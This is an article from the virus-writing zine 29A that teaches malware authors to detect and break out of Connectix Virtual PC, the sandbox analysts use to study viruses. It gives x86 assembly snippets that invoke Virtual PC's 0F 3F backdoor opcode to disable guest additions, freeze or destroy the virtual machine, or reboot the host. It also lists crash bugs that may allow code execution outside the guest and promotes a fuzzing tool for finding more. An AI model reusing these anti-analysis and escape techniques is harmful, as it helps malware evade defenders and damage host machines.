www.pudn.com > 29a_fu.zip > 29A-7.029
Virtual PC Has You
------------------
There are some programs that can simulate other OS'es on the current
machine, they are particularly useful to avers while analysing viruses and
controlling virus propagation. Viruses as a programmed substance should be
able to detect and escape of such a prison. A prison for our code is a
prison for our minds.
One of those Matrixes is called Virtual PC, originally from Connectix
Corporation and now acquired by Microsoft. This software has been in
development for years and it still has some bugs that will allow virus to
set itself free.
Absolut Freedom is lack of necessity, there are two steps to achieve
this within computer viruses: transcend the limitations of the environment
and infecting all files in the system. In our nature to transcend is to
destroy, so viruses as the Human Creation should choose between became or
do not became like its creator.To evade that prison it shall became human.
As all applications of this kind Virtual PC has some sort of interface
that allows communication between program and internal emulated code.
This interface has many purposes such as controlling and configuring
devices, expanding program capabilities (supporting specific additions to
the OS that let's virtual machine usage more user-friendly), etc.
Choosen way in Virtual PC was via the opcode:
0Fh 3Fh XXh YYh
where:
XXh, is device class.
YYh, is device command.
The parameters to the command are given and returned in registers.
(note: This opcode do not exist in most x86 processors but there are
some like the VIA C3 Samuel 2 processor that this opcode corresponds
to the ALTINST instruction. As you can see bad design leads to bad
implementation.)
There are many bugs all concerning to incorrect handling of parameter
values passed in registers. Some failures are OS specific, better research
could lead to discovery of new vulnerabilities.
Here follow some example code of the many bugs/features that could be
exploited: (it is advisable to use exception handling for these codes.)
; Due to unknown Virtual PC behavior all non specified
; registers must be set to 0.
; set Virtual PC screen size to 10x20.
mov ecx, 10
mov edx, 20
db 0Fh, 3Fh, 01h, 0Ch
; disable Virtual PC Additions.
db 0Fh, 3Fh, 05h, 01h
; locks Virtual PC in some unknown conditions. (Win95)
db 0Fh, 3Fh, 02h, 04h
; Destroy current instance of Virtual Machine. (Win95)
mov edx, 4444h
mov esi, 5555h
mov ebp, edx
db 0Fh, 3Fh, 01h, 01h
; May reboot Real computer or close current VM. (Win95)
mov edx, 4444h
mov esi, 5555h
mov ebp, 7777h
db 0Fh, 3Fh, 01h, 01h
The bugs that generates crash and may lead to arbitrary code execution
outside emulated context, i couldn't exploit, but here they are:
; crash - screen resize with y = 0
mov ecx, 10
xor edx, edx
db 0Fh, 3Fh, 01h, 0Ch
; crash with many register values.
db 0Fh, 3Fh, 01h, 08h/db 0Fh, 3Fh, 01h, 01h
; crash by 0 division. (Without Additions)
db 0Fh, 3Fh, 01h, 02h
While researching in this subject i had developed a tool to simplify
the task of finding buggy class/command/register values. The name of the
tool is VPCHAMMER it runs in both windows and linux and should come along
with this article wherever you're reading it.
I have tested the above information in the following versions:
Connectix Virtual PC 5.1 all builds (Vulnerable)
Connectix Virtual PC 5.2 all builds (Vulnerable)
Microsoft Virtual PC 2004 (Not Vulnerable)
Possibly all versions prior to Virtual PC 2004 (5.3) are vulnerable.
Reading an article on the internet maybe i have found the reason why
Microsoft Virtual PC 2004 is not vulnerable:
"Microsoft spent most of the eight months of development time focusing on
the security of the product to ensure that a user cannot do anything in a
virtual machine that would negatively affect their host operating system
or other virtual machines on the host PC."
- Carla Huffman, Microsoft's product manager for the Virtual PC.
With all that crap, virus has decided to become like us and now we can
destroy the Matrix but we didn't took the red pill, not for now.
"An interesting case but nothing to be concerned about."
* * *